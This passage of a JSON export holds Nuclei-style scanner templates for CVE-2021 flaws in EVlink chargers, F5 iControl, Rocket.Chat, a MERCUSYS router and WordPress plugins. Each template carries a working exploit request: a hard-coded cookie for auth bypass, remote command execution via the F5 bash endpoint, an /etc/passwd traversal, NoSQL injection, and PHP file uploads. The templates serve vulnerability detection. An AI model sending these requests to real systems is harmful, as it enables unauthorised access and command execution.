\"application/json\"\n\n - type: status\n status:\n - 401\n# digest: 4b0a00483046022100ed38ca4d38ee6a8827ce0cb424c58a1c6f7273942f72850e30a51a47a8ced4e80221009e6de8be7a1e2e0bca9cba77fac3f7d24b41648cf318f9678bc391420570f366:922c64590222798bb761d5b6d8e72950", "hash": "5c486eebfd9c206aa10dd19584df30aa", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30828c" }, "name": "CVE-2021-22707.yaml", "content": "id: CVE-2021-22707\n\ninfo:\n name: EVlink City < R8 V3.4.0.1 - Authentication Bypass\n author: ritikchaddha,dorkerdevil\n severity: critical\n description: |\n A CWE-798: Use of Hard-coded Credentials vulnerability exists in EVlink City (EVC1S22P4 / EVC1S7P4 all versions prior to R8 V3.4.0.1), EVlink Parking (EVW2 / EVF2 / EV.2 all versions prior to R8 V3.4.0.1), and EVlink Smart Wallbox (EVB1A all versions prior to R8 V3.4.0.1 ) that could allow an attacker to issue unauthorized commands to the charging station web server with administrative privileges.\n remediation: |\n Upgrade to EVlink City R8 V3.4.0.1 or later to fix the authentication bypass vulnerability.\n reference:\n - https://codeberg.org/AmenoCat/CVE-2021-22707-PoC/raw/branch/main/exploit.sh\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22707\n - http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-194-06\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-22707\n cwe-id: CWE-798\n epss-score: 0.27092\n epss-percentile: 0.96671\n cpe: cpe:2.3:o:schneider-electric:evlink_city_evc1s22p4_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: schneider-electric\n product: evlink_city_evc1s22p4_firmware\n shodan-query: title:\"EVSE web interface\"\n fofa-query: title=\"EVSE web interface\"\n tags: cve2021,cve,evlink,auth-bypass,schneider-electric\n\nhttp:\n - raw:\n - |\n GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n Cookie: CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '?worker=Cluster\" name=\"cluster\" id=\"id_cluster'\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c2ddc524c81bab04c11b51b6377bb61707042a4f1c9007e4d4fc8dd4b9c415ba022100df0afe79fce39ccb1592f7893da9933c9b1a645a95fa1e6be05a57e53c2b67aa:922c64590222798bb761d5b6d8e72950", "hash": "49cc1d5656f09a46e2d64d3fd501b6f5", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30828d" }, "name": "CVE-2021-22873.yaml", "content": "id: CVE-2021-22873\n\ninfo:\n name: Revive Adserver <5.1.0 - Open Redirect\n author: pudsec\n severity: medium\n description: Revive Adserver before 5.1.0 contains an open redirect vulnerability via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to redirect users to malicious websites, leading to phishing attacks or the execution of further attacks.\n remediation: |\n Upgrade Revive Adserver to version 5.1.0 or later to mitigate this vulnerability.\n reference:\n - https://hackerone.com/reports/1081406\n - https://github.com/revive-adserver/revive-adserver/issues/1068\n - http://seclists.org/fulldisclosure/2021/Jan/60\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22873\n - http://packetstormsecurity.com/files/161070/Revive-Adserver-5.0.5-Cross-Site-Scripting-Open-Redirect.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-22873\n cwe-id: CWE-601\n epss-score: 0.00922\n epss-percentile: 0.82556\n cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 6\n vendor: revive-adserver\n product: revive_adserver\n shodan-query: http.favicon.hash:106844876\n tags: cve2021,cve,hackerone,seclists,packetstorm,redirect,revive,revive-adserver\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ads/www/delivery/lg.php?dest=http://interact.sh\"\n - \"{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://interact.sh\"\n - \"{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://interact.sh\"\n - \"{{BaseURL}}/openx/www/delivery/lg.php?dest=http://interact.sh\"\n - \"{{BaseURL}}/revive/www/delivery/lg.php?dest=http://interact.sh\"\n - \"{{BaseURL}}/www/delivery/lg.php?dest=http://interact.sh\"\n\n stop-at-first-match: true\n host-redirects: true\n max-redirects: 2\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4b0a00483046022100fe9c76568f5c17d3ad5ca41852a87aca6cd7e386594a11c8e7cebc5b7d8a4c80022100d022d0ad67a7f96e9fbbfa6a04d805a775c312dab24b5b5e7ffa55a9f3751390:922c64590222798bb761d5b6d8e72950", "hash": "e5b6de62e1bb0ab506ce24ff532ba438", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30828e" }, "name": "CVE-2021-22911.yaml", "content": "id: CVE-2021-22911\n\ninfo:\n name: Rocket.Chat <=3.13 - NoSQL Injection\n author: tess,sullo\n severity: critical\n description: Rocket.Chat 3.11, 3.12 and 3.13 contains a NoSQL injection vulnerability which allows unauthenticated access to an API endpoint. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary NoSQL queries, leading to unauthorized access, data manipulation, or denial of service.\n remediation: |\n Upgrade Rocket.Chat to a version higher than 3.13 or apply the provided patch to mitigate the vulnerability.\n reference:\n - http://packetstormsecurity.com/files/162997/Rocket.Chat-3.12.1-NoSQL-Injection-Code-Execution.html\n - https://github.com/vulhub/vulhub/tree/master/rocketchat/CVE-2021-22911\n - https://hackerone.com/reports/1130721\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22911\n - https://blog.sonarsource.com/nosql-injections-in-rocket-chat\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22911\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-22911\n cwe-id: CWE-75,NVD-CWE-Other\n epss-score: 0.94773\n epss-percentile: 0.99209\n cpe: cpe:2.3:a:rocket.chat:rocket.chat:3.11.0:-:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: rocket.chat\n product: rocket.chat\n shodan-query: http.title:\"Rocket.Chat\"\n tags: cve2021,cve,rocketchat,nosqli,packetstorm,vulhub,hackerone,rocket.chat,sqli\n\nhttp:\n - raw:\n - |-\n POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\"message\": \"{\\\"msg\\\":\\\"method\\\", \\\"method\\\": \\\"getPasswordPolicy\\\", \\\"params\\\": [{\\\"token\\\": {\\\"$regex\\\": \\\"^{{randstr}}\\\"}}] }\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '[error-invalid-user]'\n - '\"success\":true'\n condition: and\n\n - type: word\n part: header\n words:\n - application/json\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202ceec4399b237de979a8a362eb44fad120bd7bb964bb3fcdbb6d6a01e6557c52022100894d28662f6e764af7d0e5fca1e84474779041d8ac3df6fa020f407efa627421:922c64590222798bb761d5b6d8e72950", "hash": "0774741ce2ade98a38c7461279366fc9", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30828f" }, "name": "CVE-2021-22986.yaml", "content": "id: CVE-2021-22986\n\ninfo:\n name: F5 iControl REST - Remote Command Execution\n author: rootxharsh,iamnoooob\n severity: critical\n description: F5 iControl REST interface is susceptible to remote command execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. This affects BIG-IP 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3; and BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.\n remediation: |\n Apply the necessary security patches or updates provided by F5 Networks to mitigate the vulnerability.\n reference:\n - https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986\n - https://support.f5.com/csp/article/K03009991\n - http://packetstormsecurity.com/files/162059/F5-iControl-Server-Side-Request-Forgery-Remote-Command-Execution.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22986\n - https://github.com/Miraitowa70/POC-Notes\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-22986\n cwe-id: CWE-918\n epss-score: 0.97449\n epss-percentile: 0.99948\n cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: f5\n product: big-ip_access_policy_manager\n tags: cve,cve2021,bigip,rce,kev,packetstorm,f5\n\nhttp:\n - raw:\n - |\n POST /mgmt/shared/authn/login HTTP/1.1\n Host: {{Hostname}}\n Accept-Language: en\n Authorization: Basic YWRtaW46\n Content-Type: application/json\n Cookie: BIGIPAuthCookie=1234\n Connection: close\n\n {\"username\":\"admin\",\"userReference\":{},\"loginReference\":{\"link\":\"http://localhost/mgmt/shared/gossip\"}}\n - |\n POST /mgmt/tm/util/bash HTTP/1.1\n Host: {{Hostname}}\n Accept-Language: en\n X-F5-Auth-Token: {{token}}\n Content-Type: application/json\n Connection: close\n\n {\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}\n\n matchers:\n - type: word\n words:\n - \"commandResult\"\n - \"uid=\"\n condition: and\n\n extractors:\n - type: regex\n name: token\n group: 1\n regex:\n - \"([A-Z0-9]{26})\"\n internal: true\n part: body\n\n - type: regex\n group: 1\n regex:\n - \"\\\"commandResult\\\":\\\"(.*)\\\"\"\n part: body\n# digest: 4a0a0047304502205b6103e9c4287d5da718fb79ec432f89995dbdb62f4452ca4f0b7984d1c4bb11022100ece1ce92a2ba853152334fb7ed172e4d6214d384761a67459317cf8e857e8128:922c64590222798bb761d5b6d8e72950", "hash": "21ba934d9003ace7ff48079133b5367c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308290" }, "name": "CVE-2021-23241.yaml", "content": "id: CVE-2021-23241\n\ninfo:\n name: MERCUSYS Mercury X18G 1.0.5 Router - Local File Inclusion\n author: daffainfo\n severity: medium\n description: MERCUSYS Mercury X18G 1.0.5 devices are vulnerable to local file inclusion via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the router.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the LFI vulnerability and ensure proper input validation is implemented.\n reference:\n - https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md\n - https://www.mercusys.com/en/\n - https://www.mercurycom.com.cn/product-521-1.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-23241\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-23241\n cwe-id: CWE-22\n epss-score: 0.00365\n epss-percentile: 0.71874\n cpe: cpe:2.3:o:mercusys:mercury_x18g_firmware:1.0.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mercusys\n product: mercury_x18g_firmware\n tags: cve2021,cve,iot,lfi,router,mercusys\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/loginLess/../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502200f34b2dae1c708ea8b7b9ef50190ec33a2e2a0f017295036db5dab2536f72dae022100c38e6b2dd3553581831251319d8596d8ecf29013ef41275641dfca0de46304a5:922c64590222798bb761d5b6d8e72950", "hash": "5c6f13457db595db4f8e33df7c196d40", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308291" }, "name": "CVE-2021-24145.yaml", "content": "id: CVE-2021-24145\n\ninfo:\n name: WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload\n author: theamanrawat\n severity: high\n description: |\n WordPress Modern Events Calendar Lite plugin before 5.16.5 is susceptible to authenticated arbitrary file upload. The plugin does not properly check the imported file, allowing PHP files to be uploaded and/or executed by an administrator or other high-privilege user using the text/csv content-type in the request. This can possibly lead to remote code execution.\n impact: |\n Remote code execution\n remediation: Fixed in version 5.16.5.\n reference:\n - https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610\n - https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.15.5.zip\n - https://github.com/dnr6419/CVE-2021-24145\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24145\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2021-24145\n cwe-id: CWE-434\n epss-score: 0.94936\n epss-percentile: 0.99118\n cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: webnus\n product: modern_events_calendar_lite\n framework: wordpress\n tags: cve,cve2021,auth,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,rce,intrusive,webnus\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1\n Host: {{Hostname}}\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Content-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875\n\n -----------------------------132370916641787807752589698875\n Content-Disposition: form-data; name=\"feed\"; filename=\"{{randstr}}.php\"\n Content-Type: text/csv\n\n \n\n -----------------------------132370916641787807752589698875\n Content-Disposition: form-data; name=\"mec-ix-action\"\n\n import-start-bookings\n -----------------------------132370916641787807752589698875--\n - |\n GET /wp-content/uploads/{{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - contains(header_3, \"text/html\")\n - status_code_3 == 200\n - contains(body_3, 'CVE-2021-24145')\n condition: and\n# digest: 4b0a00483046022100a2bd2c8892466618dbe6b82f2a50a434408d50f09f53c604bad403b9e4edba02022100c35eb57fb6d3f1e2a67234e21bb4bc2c28dd4069d00727518ded026d6d633379:922c64590222798bb761d5b6d8e72950", "hash": "dcdf87f8b5734a91f2f5c965844f0619", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308292" }, "name": "CVE-2021-24146.yaml", "content": "id: CVE-2021-24146\n\ninfo:\n name: WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure\n author: random_robbie\n severity: high\n description: WordPress Modern Events Calendar Lite before 5.16.5 does not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information, such as user credentials or database contents.\n remediation: |\n Update to the latest version of the Modern Events Calendar Lite plugin (5.16.5 or higher) to fix the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc\n - http://packetstormsecurity.com/files/163345/WordPress-Modern-Events-Calendar-5.16.2-Information-Disclosure.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24146\n - https://github.com/Hacker5preme/Exploits\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-24146\n cwe-id: CWE-862,CWE-284\n epss-score: 0.02727\n epss-percentile: 0.90292\n cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: webnus\n product: modern_events_calendar_lite\n framework: wordpress\n tags: cve,cve2021,wpscan,packetstorm,wordpress,wp-plugin,webnus\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"mec-events\"\n - \"text/csv\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b31aad67d362d0077658450c16624d12ced8ad163722f1b93e91549d5c6763ed022100fd8913dc9b6791ef83d3094c8f59276a2802b77a20cbf55c3f760ccf03f401e8:922c64590222798bb761d5b6d8e72950", "hash": "3bc86866da7dbb11723eb0c4208905a4", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308293" }, "name": "CVE-2021-24150.yaml", "content": "id: CVE-2021-24150\n\ninfo:\n name: WordPress Like Button Rating <2.6.32 - Server-Side Request Forgery\n author: theamanrawat\n severity: high\n description: |\n WordPress Like Button Rating plugin before 2.6.32 is susceptible to server-side request forgery. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Update the WordPress Like Button Rating plugin to version 2.6.32 or later.\n reference:\n - https://wpscan.com/vulnerability/6bc6023f-a5e7-4665-896c-95afa5b638fb\n - https://wordpress.org/plugins/likebtn-like-button/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24150\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-24150\n cwe-id: CWE-918\n epss-score: 0.02268\n epss-percentile: 0.88473\n cpe: cpe:2.3:a:likebtn-like-button_project:likebtn-like-button:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: likebtn-like-button_project\n product: likebtn-like-button\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,wp,ssrf,wpscan,unauth,likebtn-like-button,likebtn-like-button_project\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.oast.me')}}\" HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Interactsh Server\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502200ae092b2adea843bbfc67e272e1bbcdda95f6b1ba06ecb35d0f8be5f3de1461b0221009750e56702e2ad63ef146d19101a646b2f66d94372d7809750db43ee23d5a703:922c64590222798bb761d5b6d8e72950", "hash": "79a966c3647a615c274818daf9c1836e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308294" }, "name": "CVE-2021-24155.yaml", "content": "id: CVE-2021-24155\n\ninfo:\n name: WordPress BackupGuard <1.6.0 - Authenticated Arbitrary File Upload\n author: theamanrawat\n severity: high\n description: |\n WordPress Backup Guard plugin before 1.6.0 is susceptible to authenticated arbitrary file upload. The plugin does not ensure that imported files are in SGBP format and extension, allowing high-privilege users to upload arbitrary files, including PHP, possibly leading to remote code execution.\n impact: |\n Remote code execution\n remediation: Fixed in version 1.6.0.\n reference:\n - https://wpscan.com/vulnerability/d442acac-4394-45e4-b6bb-adf4a40960fb\n - https://wordpress.org/plugins/backup/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24155\n - http://packetstormsecurity.com/files/163382/WordPress-Backup-Guard-1.5.8-Shell-Upload.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2021-24155\n cwe-id: CWE-434\n epss-score: 0.95488\n epss-percentile: 0.99234\n cpe: cpe:2.3:a:backup-guard:backup_guard:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: backup-guard\n product: backup_guard\n framework: wordpress\n tags: cve,cve2021,authenticated,wp,packetstorm,wp-plugin,rce,wordpress,backup,wpscan,intrusive,backup-guard\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=backup_guard_backups HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json, text/javascript, */*; q=0.01\n Content-Type: multipart/form-data; boundary=---------------------------204200867127808062083805313921\n\n -----------------------------204200867127808062083805313921\n Content-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php\"\n Content-Type: application/x-php\n\n \n\n -----------------------------204200867127808062083805313921--\n - |\n GET /wp-content/uploads/backup-guard/{{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - contains(header_4, \"text/html\")\n - status_code_4 == 200\n - contains(body_3, '{\\\"success\\\":1}')\n - contains(body_4, 'CVE-2021-24155')\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - BG_BACKUP_STRINGS = {\"nonce\":\"([0-9a-zA-Z]+)\"};\n internal: true\n# digest: 4a0a00473045022100b8c26489e388600ed7392126a0d96153b15b0ad02bfc879d7e47473dcb14fa9e022041508bc27c2a5f188b6cd39a606c2be97099960ee8d30c9ddb535a3a22f9a31c:922c64590222798bb761d5b6d8e72950", "hash": "fcbfbc0405a9b25354c75b638dec6e3c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308295" }, "name": "CVE-2021-24165.yaml", "content": "id: CVE-2021-24165\n\ninfo:\n name: WordPress Ninja Forms <3.4.34 - Open Redirect\n author: dhiyaneshDk,daffainfo\n severity: medium\n description: |\n WordPress Ninja Forms plugin before 3.4.34 contains an open redirect vulnerability via the wp_ajax_nf_oauth_connect AJAX action, due to the use of a user-supplied redirect parameter and no protection in place. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.\n remediation: |\n Update to the latest version of the Ninja Forms plugin (3.4.34 or higher) to fix the open redirect vulnerability.\n reference:\n - https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818\n - https://www.wordfence.com/blog/2021/02/one-million-sites-affected-four-severe-vulnerabilities-patched-in-ninja-forms/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24165\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24165\n cwe-id: CWE-601\n epss-score: 0.00129\n epss-percentile: 0.46774\n cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: ninjaforms\n product: ninja_forms\n framework: wordpress\n tags: cve2021,cve,wordpress,redirect,wp-plugin,authenticated,wp,wpscan,ninjaforms\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_1 == 302'\n - 'status_code_2 == 302'\n - \"contains(header_2, 'Location: https://interact.sh?client_id=1')\"\n condition: and\n# digest: 4a0a00473045022100af649c1abdb63fdedcc1e46e68a77c520ee591eac3e400bbaa84654855512c8902200eb0a2419a23469cfae750f62bd2f38b597658927a13e0dc3aabafb3c49025dc:922c64590222798bb761d5b6d8e72950", "hash": "d97ae7750fe95229e30915a5fe80ddbc", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308296" }, "name": "CVE-2021-24169.yaml", "content": "id: CVE-2021-24169\n\ninfo:\n name: WordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Advanced Order Export For WooCommerce plugin before 3.1.8 contains an authenticated cross-site scripting vulnerability via the tab parameter in the admin panel. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Authenticated users can execute arbitrary scripts on the affected WordPress site, leading to potential data theft, defacement, or further compromise.\n remediation: Fixed in version 3.1.8.\n reference:\n - https://wpscan.com/vulnerability/09681a6c-57b8-4448-982a-fe8d28c87fc3\n - https://www.exploit-db.com/exploits/50324\n - https://wordpress.org/plugins/woo-order-export-lite/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24169\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24169\n cwe-id: CWE-79\n epss-score: 0.0021\n epss-percentile: 0.58287\n cpe: cpe:2.3:a:algolplus:advanced_order_export:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: algolplus\n product: advanced_order_export\n framework: wordpress\n tags: cve2021,cve,wordpress,authenticated,wpscan,xss,wp-plugin,wp,woo-order-export-lite,edb,algolplus\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=wc-order-export&tab= HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"\")'\n - 'contains(body_2, \"woo-order-export-lite\")'\n condition: and\n# digest: 4b0a004830460221009d6516913d6729de70ed63ad691d2279e02dccb63785273ce41ad95627d09b600221008c2ad831a4ea154a285ac6cc8782e79d2963279dd7368f98298158f17ca2bedf:922c64590222798bb761d5b6d8e72950", "hash": "1fd7a237a3b216a608a17f5a05389cf6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308297" }, "name": "CVE-2021-24176.yaml", "content": "id: CVE-2021-24176\n\ninfo:\n name: WordPress JH 404 Logger <=1.1 - Cross-Site Scripting\n author: Ganofins\n severity: medium\n description: WordPress JH 404 Logger plugin through 1.1 contains a cross-site scripting vulnerability. Referer and path of 404 pages are not properly sanitized when they are output in the WordPress dashboard, which can lead to executing arbitrary JavaScript code.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.\n remediation: |\n Update to the latest version of WordPress JH 404 Logger plugin (>=1.2) which addresses the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585\n - https://wordpress.org/plugins/jh-404-logger/\n - https://ganofins.com/blog/my-first-cve-2021-24176/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24176\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2021-24176\n cwe-id: CWE-79\n epss-score: 0.00136\n epss-percentile: 0.48949\n cpe: cpe:2.3:a:jh_404_logger_project:jh_404_logger:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: jh_404_logger_project\n product: jh_404_logger\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,xss,wpscan,jh_404_logger_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"JH 404 